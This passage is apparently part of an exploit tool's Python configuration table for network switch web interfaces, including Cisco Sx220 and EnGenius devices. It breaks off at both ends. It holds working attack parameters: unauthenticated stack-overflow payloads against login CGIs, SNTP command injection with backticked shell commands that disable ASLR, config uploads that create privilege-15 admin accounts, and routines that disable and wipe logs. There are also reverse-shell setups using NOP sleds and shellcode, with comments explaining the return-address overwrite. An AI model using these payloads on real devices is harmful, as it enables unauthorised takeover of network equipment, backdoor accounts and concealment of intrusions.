False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t#'encryption':'nopassword',\r\n\t\t\t\t\t\t#'content':'Content-Type\\n\\nconfig-file-header\\nusername \"USERNAME\" nopassword\\n\\n------', # Yep, working too\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=526&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'&_CMD_&login=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':False,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(212) +'_JUMP_&password='+ self.random_string(180) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Cisco': { \r\n\t\t\t\t'vendor': 'Cisco Systems, Inc.',\r\n\t\t\t\t'model':'Sx220',\r\n\t\t\t\t'uri':'https://www.cisco.com/c/en/us/support/switches/small-business-220-series-smart-plus-switches/tsd-products-support-series-home.html',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':True,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_settings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_settings',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/backup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/backup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadlang.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"language\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadlang.cgi',\r\n\t\t\t\t\t\t\t'check_uri':False,\t\t# \r\n\t\t\t\t\t\t\t'content': self.random_string(30), # We checking returned 'errMsgLangMG' and LEN of this text\r\n\t\t\t\t\t\t\t'content_check':'errMsgLangMG',\t#\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(32) +'&password=/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'2',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nconfig-file-header\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t#'encryption':'nopassword',\r\n\t\t\t\t\t\t#'content':'Content-Type\\n\\nconfig-file-header\\nusername \"USERNAME\" nopassword\\n\\n------', # Yep, working too\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'',\t\t\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=123',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'EnGenius': { \r\n\t\t\t\t'vendor': 'EnGenius Technologies, Inc.',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'/loginMsg.js',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'',\r\n\t\t\t\t\t\t'disable_query':'',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'',\r\n\t\t\t\t\t\t'clean_logfile_query':'',\r\n\t\t\t\t\t\t'clean_logmem_uri':'',\r\n\t\t\t\t\t\t'clean_logmem_query':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'security.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(280),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'datajson.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + 